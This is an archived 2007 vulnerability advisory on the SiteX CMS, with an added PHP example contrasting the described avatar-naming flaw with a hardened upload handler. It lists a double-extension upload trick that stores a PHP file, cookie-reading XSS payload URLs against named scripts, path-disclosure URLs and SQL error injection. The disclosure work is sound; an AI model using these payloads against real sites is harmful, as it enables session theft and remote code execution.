sitex multiple vulnerabilities

2007-02-26T00:00:00
ID SECURITYVULNS:DOC:16187
Type securityvulns
Reporter Securityvulns
Modified 2007-02-26T00:00:00

Description

Global risk: critical

Upload vulnerability: in the user profile, upload an avatar with a double extension such as file.php.jpg. Once it's done, you will get an error like: Fatal error: Call to undefined function imagedestroy() in /. But the last extension (jpg) is removed by the script, and the file is stored in /content/avatars as random_numberfile.php
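
The naming flaw described above, next to a hardened alternative, as an added example (not SiteX code and not from the advisory's author). The function names and the $avatarDir argument are hypothetical, and the vulnerable function is a reconstruction from the behaviour the advisory describes.

```php
<?php
// Added example, not SiteX code. All function names are hypothetical.

// Reconstruction of the flaw as the advisory describes it: the last extension
// is dropped and a random number is prefixed, so "file.php.jpg" ends up
// stored as "<random>file.php" inside the web root.
function vulnerable_avatar_name(string $clientName): string
{
    $withoutLastExt = pathinfo($clientName, PATHINFO_FILENAME); // "file.php"
    return mt_rand() . $withoutLastExt;
}

// Hardened naming: the client-supplied name is never used. The extension is
// derived from the detected image type and the base name is random.
function safe_avatar_name(string $tmpPath): ?string
{
    $allowed = [
        IMAGETYPE_JPEG => 'jpg',
        IMAGETYPE_PNG  => 'png',
        IMAGETYPE_GIF  => 'gif',
    ];
    $info = @getimagesize($tmpPath); // false when the file is not a parsable image
    if ($info === false || !isset($allowed[$info[2]])) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
}

// $upload is one entry of $_FILES; $avatarDir is an assumed storage directory.
function store_avatar(array $upload, string $avatarDir): ?string
{
    if ($upload['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($upload['tmp_name'])) {
        return null;
    }
    $name = safe_avatar_name($upload['tmp_name']);
    if ($name === null) {
        return null; // rejected before anything is written to the avatar directory
    }
    $dest = rtrim($avatarDir, '/') . '/' . $name;
    // Move only after validation, so a later failure never leaves a file behind.
    return move_uploaded_file($upload['tmp_name'], $dest) ? $name : null;
}
```

A file that parses as an image can still carry embedded script text, so the forced image extension should be paired with a web server configuration that does not execute scripts from the avatar directory.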

XSS (GET):
/sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</script>
/sitex/search.php?search=<script>alert(document.cookie)</script>

XSS via MySQL error:
/sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie)</script>
/calendar_events.php?page='"><script>alert(document.cookie)</script>

Full path disclosure:
/sitex/calendar.php?sxMonth[]=1
/sitex/calendar.php?sxMonth=1&sxYear[]=2007
/calendar_events.php?page[]=1

Multiple SQL errors: just add a ' to any variable, or to any field (as in forum, search, etc.)

regards laurent gaffie